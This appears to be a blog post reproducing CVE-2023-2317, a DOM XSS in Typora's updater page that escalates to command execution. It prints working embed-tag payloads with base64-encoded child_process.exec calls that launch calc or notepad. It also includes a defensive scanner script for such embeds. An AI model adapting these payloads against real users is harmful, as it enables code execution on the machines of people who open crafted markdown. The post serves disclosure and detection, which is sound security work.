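A DOM-based XSS exists in updater/update.html in Typora before version 1.6.7 on Windows and Linux. It allows arbitrary JavaScript code to be executed by loading a specially crafted markdown file.
The vulnerability can be exploited if a user opens a malicious markdown file, or copies text from a malicious web page and pastes it into Typora, by referencing update.html in an <embed> tag. In addition, an attacker can use the privileged interface reqnode to access the Node module child_process and execute arbitrary system commands.
Vulnerability reproduction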
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ2NhbGMnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
```
reqnode('child_process').exec(({Win32: 'calc', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
```
<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=111&newVersion=222&releaseNoteLink=333&hideAutoUpdates=false&labels=[%22%22,%22%3csvg%2fonload=top.eval(atob('cmVxbm9kZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoKHtXaW4zMjogJ25vdGVwYWQgd3d3LmV4cHBvYy5vcmcnLCBMaW51eDogJ2dub21lLWNhbGN1bGF0b3IgLWUgIlR5cG9yYSBSQ0UgUG9DIid9KVtuYXZpZ2F0b3IucGxhdGZvcm0uc3Vic3RyKDAsNSldKQ=='))><%2fsvg>%22,%22%22,%22%22,%22%22,%22%22]">
```
reqnode('child_process').exec(({Win32: 'notepad www.exppoc.org', Linux: 'gnome-calculator -e "Typora RCE PoC"'})[navigator.platform.substr(0,5)])
```
![Image [1] - [Vulnerability reproduction] Typora remote code execution vulnerability (CVE-2023-2317) - 铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/1.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![Image [2] - [Vulnerability reproduction] Typora remote code execution vulnerability (CVE-2023-2317) - 铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/2.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![Image [3] - [Vulnerability reproduction] Typora remote code execution vulnerability (CVE-2023-2317) - 铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/3.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
![Image [4] - [Vulnerability reproduction] Typora remote code execution vulnerability (CVE-2023-2317) - 铭心博客](https://oss.imxbk.com//blog/WordPress/img/wz/%E3%80%90%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E3%80%91Typora%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%28CVE-2023-2317%29/4.webp?x-oss-process=image/auto-orient,1/format,webp/watermark,text_d3d3Lnd3cnUuY24,type_ZmFuZ3poZW5naGVpdGk,size_10,g_se,x_10,y_10)
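A defensive check for the pattern described above, as an added example that is not part of the original post: it scans markdown for `<embed>`-style tags whose source is a `typora://` page and reports query parameters that carry HTML markup or base64 referencing `reqnode`/`child_process`. The function names and the sample document are constructed for illustration.

```javascript
// Added example: static check for markdown that embeds typora:// application pages.
// scanMarkdown, safeDecode and SAMPLE are illustrative names, not part of Typora.
const TAG_RE = /<(embed|iframe|object|frame)\b[^>]*?\b(?:src|data)\s*=\s*(["'])(.*?)\2/gis;
const MARKUP_RE = /<\s*[a-z!\/]|\bon[a-z]+\s*=/i; // tag start or inline event handler
const B64_RE = /[A-Za-z0-9+\/]{24,}={0,2}/g;       // long base64-looking runs
const NODE_RE = /reqnode|child_process/;           // privileged interface named on this page

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; } // keep raw text on bad escapes
}

function scanMarkdown(text) {
  const findings = [];
  for (const m of text.matchAll(TAG_RE)) {
    const [, tag, , url] = m;
    if (!/^\s*typora:\/\//i.test(url)) continue;   // only internal app pages matter here
    const reasons = ['typora:// page loaded from document content'];
    const query = url.includes('?') ? url.slice(url.indexOf('?') + 1) : '';
    for (const pair of query.split('&').filter(Boolean)) {
      const eq = pair.indexOf('=');
      const name = safeDecode(eq < 0 ? pair : pair.slice(0, eq));
      const value = safeDecode(eq < 0 ? '' : pair.slice(eq + 1));
      if (MARKUP_RE.test(value)) reasons.push(`HTML markup in parameter "${name}"`);
      for (const blob of value.match(B64_RE) || []) {
        const decoded = Buffer.from(blob, 'base64').toString('latin1');
        if (NODE_RE.test(decoded)) reasons.push(`base64 in "${name}" references reqnode/child_process`);
      }
    }
    const line = text.slice(0, m.index).split('\n').length; // 1-based line of the tag
    findings.push({ tag: tag.toLowerCase(), line, reasons });
  }
  return findings;
}

// Constructed sample: the encoded string is an inert marker, not a command.
const marker = Buffer.from("reqnode('child_process') // inert marker").toString('base64');
const SAMPLE = [
  '# Meeting notes (constructed sample)',
  '<embed style="height:0;" src="typora://app/typemark/updater/updater.html?curVersion=1&labels=' +
    encodeURIComponent(`["<svg/onload=atob('${marker}')>"]`) + '">',
  '<embed src="https://example.com/clip.mp4">',
].join('\n');

console.log(JSON.stringify(scanMarkdown(SAMPLE), null, 2));
```

Running it over untrusted `.md` files or clipboard HTML before opening them in a Typora version older than 1.6.7 gives a quick triage signal; upgrading to 1.6.7 or later remains the fix.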